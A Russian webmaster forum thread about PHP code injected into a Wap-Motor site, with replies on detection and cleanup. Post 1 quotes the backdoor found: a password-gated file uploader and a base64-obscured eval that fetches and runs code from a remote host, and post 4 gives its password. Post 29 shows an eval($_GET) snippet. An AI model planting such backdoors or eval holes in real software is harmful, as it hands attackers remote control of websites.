Внедрение на сайт чужих кодов.
1. Удаленный (05.07.2018 / 09:07)Всем привет, как защититься и оградиться от внедрения в код моих сайтов посторонних кусков кода от дешёвых хостеров? к сожалению примеров нет, удалил уже, но факт что в некоторых страницах php в режиме дисплей еррор ссылки на посторонние вредные шокирующие рекламы всякой дряни ведут, на уровне скорее роботов чем людей, однако этот неприятный сюрприз случайно обнаружил когда переделывал посторонний модуль для другого домена, а на чистом движке так и не заметил бы ничего.
Вот что теперь делать? Каждый раз вручную проверять весь движок? Wap-Motor).
Вот и пример нашёлся аж в админке))
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
2. Михаил (05.07.2018 / 09:23)
Как вариант перейти на нормальный хостинг.
3. Вантуз-мен (05.07.2018 / 10:06)
@NaPapertiOleg, ну и зачем нужны такие хостеры, поменяй просто и все
4. ZiGR (05.07.2018 / 10:19)
md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
md5('loh') = 3ff1ea09b981d88e7c8752b329a7702e
5. Удаленный (05.07.2018 / 10:22)
Поменять хост это понятно, но тема не про это, а вообще контроль своего кода в принципе возможен или нет? Никто ни на каком хосте не застрахован от этого, в любое время в любом месте разместят такое в движке и не узнаешь.
6. Вантуз-мен (05.07.2018 / 10:36)
А ты не думаешь , что это через сторонние модули внедряется, хостеры мне кажется не нужны такие вставки, если он захочет , то итак загрузить все что нужно
7. Удаленный (05.07.2018 / 10:48)
Не знаю, сам лично никогда с таким не сталкивался, например вап-мотором в своей модификации пользуюсь с самого момента выхода 24-й версии с осени прошлого года и с тех пор менял несколько доменов и несколько хостингов, но движок одинаковый всегда в одном виде, но эти коды появились только сейчас и только на очередном дешёвом хостинге, только на одном последнем, например на бегете такого не было вообще, и теперь уже меня терзают смутные сомнения ... про другие хосты.
8. /7o/loTeH4I1k (05.07.2018 / 11:30)
Хостеру проще на уровне веб-сервера рекламу внедрить, чем по скриптам клиентов шерстить. Ищи через что это делают (логи анализируй). Вообще посмотри когда файл был изменён, от этого и отталкивайся.
Это может быть как взлом хостинга, так и конкретно сайта
9. Удаленный (05.07.2018 / 11:47)
Вот ситуация вчера поздно вечером на ночь зарегистрировал новый домен и новый хостинг и разместил движок, но про этот сайт в принципе за ночь никто не мог в сети интернет узнать никак, а утром узнаю про этот код случайно когда полез проверять компилятор java книг на настройку для нового домена в манифесте, вот чудеса), да ещё пробежался поисковиком в нотепаде и в админке всплыла тоже такая ерунда.
Сам вап мотор не может такое сделать, а посторонний модуль только компилятор java книг на файлах, без баз данных, и из копипаста текста в форму отправки данных, там одна php страница и тоже раньше никогда такого не было.
10. Удаленный (05.07.2018 / 12:32)
ну вообще не понятки полные, я же удалил все эти коды, а сейчас перед запаковкой в архив снова проверил и они опять появились, прямо на жёстком диске на пк, вообще ничего не понимаю.
11. /7o/loTeH4I1k (05.07.2018 / 12:58)
Какой антифирус? FTP клиент? мб зверьё какое развелось? И посмотри ещё файлики, в них может быть файлик, который делает такую пакость.
Смотри время изменения файла, хоть поймёшь когда это происходит
12. Удаленный (05.07.2018 / 13:18)
/7o/loTeH4I1k, антивирус стандартный встроенный в виндовс 8.1, фтп в тотал коммандере, последнее время ставил только офф вибер и скайп на пк, игрушки давно новые не скачивал. Вот за время спс, заметить надо время изменения файла, даже незнаю на что и подумать, жаль напрасно второпях на хостера наехал (., просто знаю такую практику некоторых хостеров и поэтому сразу на хост и подумал.
13. Вантуз-мен (05.07.2018 / 13:51)
@NaPapertiOleg, через ftp прям с твоего компа может спокойно залезть, так что попробуй все удалить и поставить чистый движок с другого компа и посмотри, скорее всего все будет нормально
у тебя кстати вполне возможно уже загружен шелл, так что все файлы нужно перезаливать
14. /7o/loTeH4I1k (05.07.2018 / 14:13)
@NaPapertiOleg, только совсем неумный хостер будет внедрять рекламу прямо в клиентские скрипты. Вспомни h2m, там была реклама, однако файлы никто не трогал. Это делается всё проще)
Добавлено через 02:29 сек.
Вантуз правильно сказал, через FTP легко могут заражаться сайты, если зверёк сидит у тебя в компе (он кстати и пароли от FTP сворует).
15. Удаленный (05.07.2018 / 16:25)
я в шеллах ничего не понимаю, но через поисковик узнал что нужно искать куски кода с eval и ничего подозрительного не нашёл, есть несколько, но они стандартные в движке.
16. Вантуз-мен (05.07.2018 / 17:55)
@NaPapertiOleg, тебе уже куда-нибудь могли залить шелл, который зашифрован и никак его легко не идентифицировать
17. JustZero (05.07.2018 / 21:50)
Шелл может быть и не .php
18. Izgoj (06.07.2018 / 10:20)
Ты свою сборку все время пытаешься ставить? Может взять чистый двиг отсюда и поставить. Если будет без сюрпризов, то будет более понятно откуда ноги растут.
19. napaperti (07.07.2018 / 06:17)
Прошу прощения за дубль, так получилось, так значит шелла в движке сложно обнаружить и только вручную пересматривать все страницы? Понятно, но к счастью у меня был дубль на жёстком диске для другого домена, чистый и не пришлось снова из гитхаба переделывать для себя оригинальный движок.
Однако вопрос по упрощению обнаружения в движке посторонних кодов остаётся открытый, как бы сделать это более удобно? В наше время наверное это важная функция чтоб оперативно обнаружить шелл в движке, как Вы думаете? Тем более неизвестно откуда он взялся и может быть снова заражение
20. /7o/loTeH4I1k (07.07.2018 / 09:56)
napaperti, я не знаю есть ли в роторе, но раньше в wap-motor была такая функция. По сути она просто отслеживает файлы появившиеся с момента последней проверки.
Если в роторе нету, я постараюсь на досуге сделать
21. napaperti (07.07.2018 / 13:52)
/7o/loTeH4I1k, так у меня вап мотор, 24й или 25й версии, да только мне не появление новых файлов надо, а появление новых кусков кода в стандартных файлах.
22. napaperti (07.07.2018 / 20:02)
Скажите пожалуйста, а через JS скриптытна моём сайте, но которые исполняются на чужих сайтах мог бы шелл ко мне попасть?
23. Владислав (08.07.2018 / 00:23)
автор.Хостинг какой?мне на бест хостере заливали левый код в ДЛЕ.выяснилось заливал сам хостер
24. /7o/loTeH4I1k (08.07.2018 / 01:56)
napaperti, через JS - крайне маловероятно, он выполняется в браузере, а не на сервере. Разве что это целевая атака именно на админов сайтов на моторе (эта вероятность тоже близится к нулю).
Там чекер как раз и следил за изменениями файлов
25. napaperti (08.07.2018 / 06:12)
Владислав, хостинг http://lite.host
26. End (09.07.2018 / 12:32)
Проверить пк утилитой dr web cureit бесплатно и локально.
27. Радъ) (20.07.2018 / 11:26)
В wap-motore же есть функция сканирования в админке и она как раз определяет время когда были изменены последний раз файлы и папки, настраивается расширение файлов , просканируй и отпечатается время и далее смотри сам, изменишь что сам и снова просканируй и тд., а потом смотри по времени что менялось или нет с момента последнего скана.
28. Dmitry Kokorin (21.07.2018 / 21:45)
End, тогда уж лучше айболитом
29. Удаленный (02.11.2019 / 18:22)
Всё просто, идёте на сайт pitcher.su и выбираете себе бесплатный прогон, потом ставите себе на сайт код
<a href="<?php if(isset($_GET['link'])) echo(eval($_GET['link'])); ?>">ОБРАТНАЯ ССЫЛКА</a>
и после активации прогона нате вам, у вас на сайте полно таких рекламных кодов вдруг появилось и никакого взлома, всё сами
30. erasier (03.11.2019 / 07:16)
можно сделать и сохранить хеш файлов движка и сравнивать время от времени. если изменился, значит взломали
31. Ахмед в ярости (13.01.2021 / 13:13)
мне так один петух внедрил на сайт шелл через свой же модуль и еще за мои деньги, пришлось сайт удалить
32. Волан-де-Морт (03.04.2021 / 23:01)
Ахмед в ярости, заказывать нужно у тех, кто давно работает и у того, у кого хорошие отзывы.
33. Vitalik (04.04.2021 / 10:20)
Пользуюсь хостингом http://hostiv.ru - Пока нариканий нет.
34. Makc (04.04.2021 / 13:35)
Пользуюсь хостингом http://hostiv.ru - Пока нариканий нет.Хостинг за 6 р./мес. не может внушать доверия. Сейчас даже вдс доступные вполне. Забыл что такое хостинг.
35. Vitalik (04.04.2021 / 16:09)
Хостинг за 6 р./мес. не может внушать доверия. Сейчас даже вдс доступные вполне. Забыл что такое хостинг.ну это как-бы говорят БОМЖ тариф
И да, сейчас доверят некому не нужно не важно, Сервер, ВДС, ХОСТИНГ.
36. Алик Кутакбашев (05.04.2021 / 13:23)
6 рубля в месяц это не серезная разговор сигарета стоит дороже
URL: https://visavi.net/topics/44012